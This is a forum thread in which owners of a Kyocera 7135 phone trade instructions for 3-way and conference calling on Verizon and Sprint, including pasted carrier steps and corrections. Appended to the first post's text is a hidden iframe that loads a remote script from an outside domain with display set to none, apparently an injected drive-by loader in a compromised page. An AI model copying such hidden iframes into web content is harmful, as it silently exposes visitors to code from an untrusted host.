+ Reply to Thread
Page 1 of 2 1 2 LastLast

Thread: 3 way calling?

3 way calling?

I love this phone!!!!!!!!

But most new phones come with a 3 way calling or conference feature built in menu while on a call.

I do not see it on the screen, is there a way to add this feature?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

It is not a phone feature, it is a network feature. See VZW's web site for instructions. Should be free on any digital plan, but they sometimes forget to turn it on, so you may need to call them.

Alan

thanx alan,

just like they forgot to turn on my caller id feature.

It works like this:

If you're on a call, and another call comes in, you can put your current caller on hold and pick up the incoming by pressing the Green button. You can then join both callers into a 3-way by pressing the Green button again.

Similarly, you can initiate a 3-way by getting the first person on the line, dialing the 2nd person, and then joining into a 3-way by pressing the Green button.
    Ahhhh, gadgets! :bigthumb:

I don't use 3-way often, but are you saying that you don't have to be the initial caller of the third person to do 3-way?

I thought that if you're on a call, and an incoming call appears, you can only do call waiting. What if you want to switch between the 2 callers but don't want them to talk to each other?

Administrator
    ..then all you do is press the talk button to toggle between both parties...

if i called you on your cell phone and i asked you to call someone else, all you do is hit send, then dial the #.. wait to connect, then hit send to connect everyone... now while you are doing this, if someone was to call you, they would go directly to VM....

3 Way Calling on 7135

I tried to figure this out and I couldn't! If you are on a phone call, how can you dial another number? I tried to switch to the other line and I hung up the call. I tried to dial from the PDA and nothing happened. I have Verizon's call plan and I should be able to do this!

Help me please!

While you're in the first call you should be able to hit the SEND key (green phone) and then dial the other number. Here are the instructions from the Verizon web site:

When the first caller is on the line, dial the number of the second person and press SEND (green phone key).

After the second caller answers, press SEND again to reconnect the first caller.

To disconnect the first caller, ask them to hang up.

To disconnect the second caller, press SEND, or ask them to hang up.

To disconnect both callers, press END (red phone key).

If someone tries to call you while a conference call is in progress, they'll either hear a busy signal or will be forwarded to your voice mailbox if you subscribe to a voice mail product. Or, if you've activated Call Forwarding, the call will be forwarded immediately. You'll be billed airtime for each call included in a conference.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Art, careful that you're not pressing the END (red) button by mistake.

3 way conference calling

These may be dumb questions:

1. How do I make a 3 way conference call on this phone?
    2. If I am on one call and I receive another call, how do I join the two calls?

Administrator
    read this thread for #1..

#2. if you are on the phone and your other line rings, thats call waiting. you cannot join those two calls... you will have to call one of the poeple back and then initiate 3 way calling....

Originally posted by marctronixx
    read this thread for #1..

#2. if you are on the phone and your other line rings, thats call waiting. you cannot join those two calls... you will have to call one of the poeple back and then initiate 3 way calling....

Actually, I conferenced a call waiting call by accident yesterday so it can be done. I was on with person A and got a call waiting tone. I hit the send button and couldn't seem to find caller B. When I hit the send button again to go back to caller A, they were both conferenced in. I doubt I could have done it if I was trying, but it can be done.

Administrator
    sounds like eithrer an error somewhere or something verizon specific.

as in land line phone calls, if you get a call waiting call you cant connect that call and your original together but simply clicking back over. im on sprint and the only way to initiate 3 way call is if you call someone while placing the other caller on hold...

Originally posted by tmwebsites
    While you're in the first call you should be able to hit the SEND key (green phone) and then dial the other number. Here are the instructions from the Verizon web site:

When the first caller is on the line, dial the number of the second person and press SEND (green phone key).

After the second caller answers, press SEND again to reconnect the first caller.

To disconnect the first caller, ask them to hang up.

To disconnect the second caller, press SEND, or ask them to hang up.

To disconnect both callers, press END (red phone key).

If someone tries to call you while a conference call is in progress, they'll either hear a busy signal or will be forwarded to your voice mailbox if you subscribe to a voice mail product. Or, if you've activated Call Forwarding, the call will be forwarded immediately. You'll be billed airtime for each call included in a conference.

Nick,
    Thanks for the step by step. I have done it before, but can never remember the process when I really need it.

So, I copied your directions and pasted them into a "Memo" on my 7135, so I will always have it for reference.

Thanks man!
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Markito
    Nick,
    Thanks for the step by step. I have done it before, but can never remember the process when I really need it.

So, I copied your directions and pasted them into a "Memo" on my 7135, so I will always have it for reference.

Thanks man!
    Probably old news by now, but one step is missing in the instructions above. When you are talking to the other person, you can't simply dial the number, all they'll hear is beeps. You must first hit SEND, then dial, then SEND to call the third person, then SEND again to connect all 3 people.
    Verizon says to hit SEND before dialing in the first sentence, they just don't repeat it in the step by step. Works great.
    ...cease

Never Forget 9/11/01 kerryclair's Avatar
    3-way calling is free with Verizon's plans? I have the 800 minute month plan, two phones. I never tried 3-way calling. Thought it was an extra "pay" service....
    Anyone know?

Originally posted by kerryclair
    3-way calling is free with Verizon's plans? I have the 800 minute month plan, two phones. I never tried 3-way calling. Thought it was an extra "pay" service....
    Anyone know?
    The only extra charge for 3-way calling is that you get charged minutes for 2 calls while you are all connected. If 1 person hangs up, you go back to being charged for 1 call.

Never Forget 9/11/01 kerryclair's Avatar
    Wow. Thanks for this info.
    This forum is the best thing to ever happen to cellular phones...

K.

Originally posted by cease
    Probably old news by now, but one step is missing in the instructions above. When you are talking to the other person, you can't simply dial the number, all they'll hear is beeps. You must first hit SEND, then dial, then SEND to call the third person, then SEND again to connect all 3 people.
    Verizon says to hit SEND before dialing in the first sentence, they just don't repeat it in the step by step. Works great.
    If I hit SEND first, I get that boop-beep-boop-beep sound, and whether or not I hit SEND first, the other caller hears me dial out.

Has anyone figured out how to use the Address Book or Agendus to dial out while having the first caller on line. It seems to me that while your connected to your first call, you must actually dial the number using the keypad. What if the phone # you need to dial resides in Address book or Agendus? I coudn't use the auto-dial feature of Agendus to dial that second person.
    Robert